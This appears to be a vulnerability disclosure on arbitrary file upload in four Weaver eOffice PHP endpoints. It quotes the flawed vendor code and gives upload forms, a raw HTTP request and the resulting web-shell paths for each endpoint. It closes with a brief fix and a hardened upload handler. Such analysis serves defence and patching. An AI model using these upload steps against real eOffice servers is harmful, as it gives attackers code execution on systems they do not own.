Weaver eOffice allows arbitrary file upload, which leads directly to getshell.
1. File location: /webservice/upload.php. The related code is as follows:
<?php
include_once( "inc/utility_all.php" );
// The extension is extracted here but never compared against anything
$pathInfor = pathinfo( $_FILES['file']['tmp_name'] );
$extension = $pathInfor['extension'];
$role = UPLOADROLE;
$attachmentID = createfiledir( );
global $ATTACH_PATH;
$path = $ATTACH_PATH.$attachmentID;
if ( !file_exists( $path ) )
{
    mkdir( $path, 448 );   // 448 decimal is 0700 octal
}
$attachmentName = $_FILES['file']['tmp_name'];
// The client-supplied original file name is used unchanged
$fileName = $path."/".$_FILES['file']['name'];
$fileName = iconv( "UTF-8", "GBK", $fileName );
move_uploaded_file( $_FILES['file']['tmp_name'], $fileName );
if ( !file_exists( $fileName ) )
{
    echo "false";
}
else
{
    echo $fileName;
    echo $attachmentID."*".$_FILES['file']['name'];
}
?>
The upload is accepted without any restriction, and the file is stored under its original name. The target path is built as follows:
$path = $ATTACH_PATH.$attachmentID;
$fileName = $path."/".$_FILES['file']['name'];
Construct an upload form as follows:
<form action="http://[website address]/webservice/upload.php" enctype="multipart/form-data" method="POST">
    <input name="file" type="file">
    <input type="submit">
</form>
For example, if the returned content is 3023528241*I.php, the corresponding path is /attachment/3023528241/I.php.
2. File location: /inc/jquery/uploadify.php. The code is as follows:
<?php
function createFileDir( )
{
    global $ATTACH_PATH;
    mt_srand( ( double )microtime( ) * 1000000 );
    $RADOM_ID = mt_rand( ) + mt_rand( );
    if ( !file_exists( $ATTACH_PATH.$RADOM_ID ) )
    {
        return $RADOM_ID;
    }
    else
    {
        createfiledir( );   // vendor code: the retry's result is not returned
    }
}
if ( !empty( $_FILES ) )
{
    $tempFile = $_FILES['Filedata']['tmp_name'];
    $attachmentID = createfiledir( );
    // uploadPath is taken straight from the request and decides the target directory
    $uploadPath = $_REQUEST['uploadPath'];
    if ( trim( $uploadPath ) == "" )
    {
        $targetPath = $_SERVER['DOCUMENT_ROOT']."/attachment/".$attachmentID;
    }
    else
    {
        $targetPath = $uploadPath."/sent/attachment/".$attachmentID;
    }
    if ( !file_exists( $targetPath ) )
    {
        mkdir( $targetPath, 448, true );
    }
    // Original file name again, and no extension check
    $targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];
    move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
    echo $attachmentID;
}
?>
The file is stored under its original name, so a shell can be uploaded directly. The target path is built as follows:
$targetPath = $uploadPath."/sent/attachment/".$attachmentID;
$targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];
Construct an upload form as follows:
<form action="http://[website address]/inc/jquery/uploadify.php" enctype="multipart/form-data" method="POST">
    <input name="Filedata" type="file">
    <input type="submit">
</form>
For example, the returned content 1720699075 corresponds to /attachment/1720699075/2.php.
3. File location: /general/weibo/javascript/LazyUploadify/uploadify.php
Some related code is as follows:
<?php
// ... some code omitted ...
include_once( "inc/conn.php" );
if ( !empty( $_FILES ) )
{
    $tempFile = $_FILES['Filedata']['tmp_name'];
    $fileName = $_FILES['Filedata']['name'];
    $thumbWidth = $_REQUEST['thumbWidth'];
    $thumbHeight = $_REQUEST['thumbHeight'];
    $attachmentID = createfiledir( );
    $targetPath = ROOT_PATH."/attachment/".$attachmentID."/";
    if ( !file_exists( $targetPath ) )
    {
        mkdir( $targetPath, 448, true );
    }
    $targetPath = str_replace( "//", "/", $targetPath );
    // The upload is written under its original name before the extension is even examined
    $targetOriginalFile = $targetPath.$fileName;
    $targetOriginalFile = iconv( "UTF-8", "GBK", $targetOriginalFile );
    move_uploaded_file( $tempFile, $targetOriginalFile );
    // The extension only decides whether a thumbnail is made; nothing is rejected
    $fileExt = strtolower( substr( $fileName, strrpos( $fileName, "." ) ) );
    switch ( $fileExt )
    {
        case ".jpg":
        case ".jpeg":
        case ".png":
        case ".gif":
            $targetThumbPath = ROOT_PATH."/attachment/thumb/".$attachmentID;
            if ( !file_exists( $targetThumbPath ) )
            {
                mkdir( $targetThumbPath, 448, true );
            }
            $targetThumbFile = $targetThumbPath."/".$fileName;
            $targetThumbFile = iconv( "UTF-8", "GBK", $targetThumbFile );
            resizeimage( $targetOriginalFile, $targetThumbFile, $thumbWidth, $thumbHeight );
            break;
    }
    $targetThumbFile = iconv( "GB2312", "UTF-8", $targetThumbFile );
    $returnValue['thubmPath'] = str_replace( ROOT_PATH, "", $targetThumbFile );
    $returnValue['attachmentID'] = $attachmentID;
    $returnValue['attachmentName'] = $fileName;
    $returnValue['attachmentSize'] = filesize( $targetOriginalFile );
    echo json_encode( $returnValue );
}
?>
There is still no filtering at all, so getshell is just as direct. The form is as follows:
<form action="http://[website address]/general/weibo/javascript/LazyUploadify/uploadify.php" enctype="multipart/form-data" method="POST">
    <input name="Filedata" type="file">
    <input type="submit">
</form>
The result is returned in JSON format; the path is /attachment/2012291572/2.php.
4. File location: /general/weibo/javascript/uploadify.php
Some code is as follows:
<?php
include_once( "inc/conn.php" );
include_once( "general/weibo/inc/weibo.inc.php" );
include_once( "general/weibo/inc/thumb_handler.php" );
if ( !empty( $_FILES ) )
{
    if ( $_REQUEST['uploadType'] == "log" )
    {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        $fileName = $_FILES['Filedata']['name'];
        $targetPath = ROOT_PATH."/attachment/";
        // The extension is copied from the uploaded name; the file is always stored as log.<ext>
        $fileExt = substr( $fileName, strrpos( $fileName, "." ) );
        $logName = "log".$fileExt;
        $targetFile = str_replace( "//", "/", $targetPath )."/".$logName;
        move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
        resize( $targetFile, $targetFile, 295, 195 );
        $query = "SELECT * FROM unit";
        $result = exequery( $connection, $query );
        if ( mysql_num_rows( $result ) == 0 )
        {
            $query = "INSERT INTO unit (LOGO) VALUES ('".$logName."')";
        }
        else
        {
            $query = "UPDATE unit SET LOGO = '".$logName."'";
        }
        if ( exequery( $connection, $query ) )
        {
            echo $logName;
        }
        else
        {
            echo false;
        }
    }
    else
    {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        $fileName = $_FILES['Filedata']['name'];
        $userID = $_REQUEST['userID'];
        $thumbWidth = $_REQUEST['thumbWidth'];
        $thumbHeight = $_REQUEST['thumbHeight'];
        // userID comes from the request and becomes part of the path and file name
        $targetPath = ROOT_PATH."/attachment/personal/".$userID;
        if ( !file_exists( $targetPath ) )
        {
            mkdir( $targetPath, 448, true );
        }
        $fileExt = substr( $fileName, strrpos( $fileName, "." ) );
        $targetFile = str_replace( "//", "/", $targetPath )."/".$userID."_temp".$fileExt;
        move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );
        $windowWidth = $_REQUEST['windowWidth'];
        $windowHeight = $_REQUEST['windowHeight'];
        resize( $targetFile, $targetFile, $windowWidth - 40, $windowHeight - 100 );
        list( $width, $height ) = getimagesize( $targetFile );
        echo json_encode( array(
            "width" => $width,
            "height" => $height,
            "imageSrc" => "/".str_replace( ROOT_PATH, "", $targetFile )
        ) );
    }
}
?>
The form can be self-constructed. The Fiddler request is as follows:
POST http://172.18.30.133/general/weibo/javascript/uploadify/uploadify.php?uploadType=log HTTP/1.1
Host: 172.18.30.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: zou__Session=7f895dd642da7e165f485c5a638224e4; PHPSESSID=9ed7d522a1e2caf3f2fe76082450b3a8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214

-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php

-----------------------------94401197120954--
Shell path: /attachment/log.php
For any other uploadType, the file lands at /attachment/personal/$userID/{$userID}_temp.php, with both $userID and the extension taken from the request.
In the phith0n case, I randomly selected a test.
Solution:
Filter uploaded files.
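As an added example (not eOffice's code and not from the original report), a hardened PHP upload handler that closes the three defects visible in the four scripts above: no extension check, a client-chosen file name, and, in inc/jquery/uploadify.php, a request-chosen target directory. ATTACH_ROOT, ALLOWED_EXT and ALLOWED_MIME are assumed values; the login check is left to the application's own session handling.

```php
<?php
// Added example, not eOffice code: a hardened replacement for the
// move_uploaded_file() pattern used by the scripts above.
// Assumptions: ATTACH_ROOT is the attachment directory and the web
// server is configured not to execute scripts stored under it.
const ATTACH_ROOT  = '/var/www/attachment';
const ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];
const ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif', 'application/pdf'];

function safeStoreUpload(array $file, string $attachRoot): array
{
    // Reject failed or forged uploads (tmp_name must come from PHP itself)
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    // Allow-list the extension; the vendor code computed it but never checked it
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException('file type not allowed');
    }
    // Sniff the content; the client's Content-Type header is untrusted
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-chosen directory id and file name: neither the original name nor
    // any request parameter (cf. $_REQUEST['uploadPath'], $_REQUEST['userID']) reaches disk
    $attachmentID = bin2hex(random_bytes(8));
    $dir = rtrim($attachRoot, '/') . '/' . $attachmentID;
    if (!mkdir($dir, 0700, true) && !is_dir($dir)) {
        throw new RuntimeException('cannot create attachment directory');
    }
    $target = $dir . '/' . bin2hex(random_bytes(8)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('cannot store file');
    }
    // The original name is returned for display only, never used as a path
    return ['attachmentID' => $attachmentID, 'stored' => $target,
            'originalName' => basename($file['name'])];
}

// Endpoint usage, to be placed after the application's own login check
if (!empty($_FILES['Filedata'])) {
    try {
        echo json_encode(safeStoreUpload($_FILES['Filedata'], ATTACH_ROOT));
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
}
```

Requires the fileinfo extension and PHP 7 or later for random_bytes() and the null-coalescing operator.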